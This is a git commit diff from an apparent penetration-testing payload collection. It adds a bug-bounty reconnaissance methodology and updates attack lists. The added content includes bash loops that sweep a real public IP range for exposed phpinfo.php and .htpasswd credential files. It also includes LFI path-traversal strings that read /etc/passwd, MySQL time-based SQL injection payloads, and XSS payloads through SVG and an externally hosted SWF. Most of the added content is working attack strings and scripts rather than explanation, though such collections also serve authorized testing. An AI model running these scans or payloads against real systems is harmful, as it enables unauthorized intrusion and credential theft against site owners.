Methodology added, XSS payloads updated,little fix

This commit is contained in:
swisskyrepo 2016-11-06 12:42:50 +07:00
parent 22e8dc091f
commit 54bf6d9a5b
10 changed files with 149 additions and 32 deletions

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
Low_hanging_fruits.md

View File

@ -1,29 +0,0 @@
# Collection of usefull scripts and tricks
## Dorks
Google Dork to find subdomains
```
site:*.domain.com -www
site:http://domain.com ext:php
site:http://domain.com filtype:pdf
```
## Scripts
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
```
Script to detect all .htpasswd files in a range of IPs
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
```
## Thanks to
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/

View File

@ -0,0 +1,117 @@
# Methodology and Enumeration
## Bug Hunting Methodology
1. Enumerate all subdomains (only if the scope is *.domain.ext)
Using KnockPy with Daniel Miesslers SecLists for subdomain "/Discover/DNS"
```
git clone https://github.com/guelfoweb/knock
git clone https://github.com/danielmiessler/SecLists.git
knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
```
Using Jason Haddix's enumall Recon-ng script,
```
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd recon-ng
pip install -r REQUIREMENTS
ln -s /$recon-ng_path /usr/share/recon-ng
git clone https://github.com/jhaddix/domain.git
cd domain
./setup_enumall.sh
./enumall.py domain.com
-w to run a custom wordlist with recon-ng
-a to use alt-dns
-p to feed a custom permutations list to alt-dns (requires -a flag)
-i to feed a list of domains (can also type extra domains into the original command)
```
2. Subdomain take over using HostileSubBruteForcer
```
git clone https://github.com/nahamsec/HostileSubBruteforcer
chmox +x sub_brute.rb
./sub_brute.rb
```
3. EyeWitness and Nmap scans from the KnockPy and enumall scans
```
git clone https://github.com/ChrisTruncer/EyeWitness.git
./setup/setup.sh
./EyeWitness.py -f filename -t optionaltimeout --open (Optional)
./EyeWitness -f urls.txt --web
./EyeWitness -x urls.xml -t 8 --headless
./EyeWitness -f rdp.txt --rdp
```
4. Basic NMAP (if allowed ^^')
```
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 &
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL IPS.csv
• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
• 192.168.0.1 is the IP address to scan
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
• -T4 defines the timing for the task (options are 0-5 and higher is faster)
```
5. List all the subdirectories with DirBuster or GoBuster
```
./gobuster -u http://buffered.io/ -w words.txt -t 10
-u url
-w wordlist
-t threads
More subdomain :
./gobuster -m dns -w subdomains.txt -u google.com -i
```
6. Explore the website
```
- Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
- Map technologies used with Wappalyzer and Burp Suite (or ZAP) proxy
- Explore and understand available functionality, noting areas that correspond to vulnerability types
```
7. Look for private information in GitHub repos with GitRob
```
gitrob commd
```
8. Subscribe to the site and pay for the additional functionality to test
9. Launch a Nikto scan in case you missed something
## Google Dorks
Google Dork to find subdomains
```
site:*.domain.com -www
site:http://domain.com ext:php
site:http://domain.com filetype:pdf
```
## Scripts
Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/phpinfo.php; done &
```
Script to detect all .htpasswd files in a range of IPs
```
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
```
## Thanks to
* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/

View File

@ -3,12 +3,13 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
## Exploit
Basic LFI (null byte and double encoding)
Basic LFI (null byte, double encoding and other tricks)
```
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
```
LFI Wrapper rot13 and base64 - php://filter case insensitive

View File

@ -22,6 +22,7 @@ Last modifications :
* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
* [Nikto](https://cirt.net/nikto2)
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* [Wappalyzer](https://wappalyzer.com/download)
# More resources
Book's list:

View File

@ -76,6 +76,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
MySQL Time Based
```
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
```
@ -107,5 +108,21 @@ Polyglot injection (multicontext)
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
## Thanks to
* http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
## Thanks to - Other resources
* MySQL:
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* MSQQL:
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
- [PentestMonkey's Oracle SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
- [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)

View File

@ -136,9 +136,18 @@ XSS in SVG (short)
```
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
```
XSS in SWF
```
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(?js=history.go(-1),_self);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvalidfileinvalidfile,target);setTimeout(alert(w.document.location);w.close();,1);
```
more payloads in ./files
## XSS with Relative Path Overwrite - IE 8/9 and lower
You need these 3 components

View File

Before

Width:  |  Height:  |  Size: 379 B

After

Width:  |  Height:  |  Size: 379 B

Binary file not shown.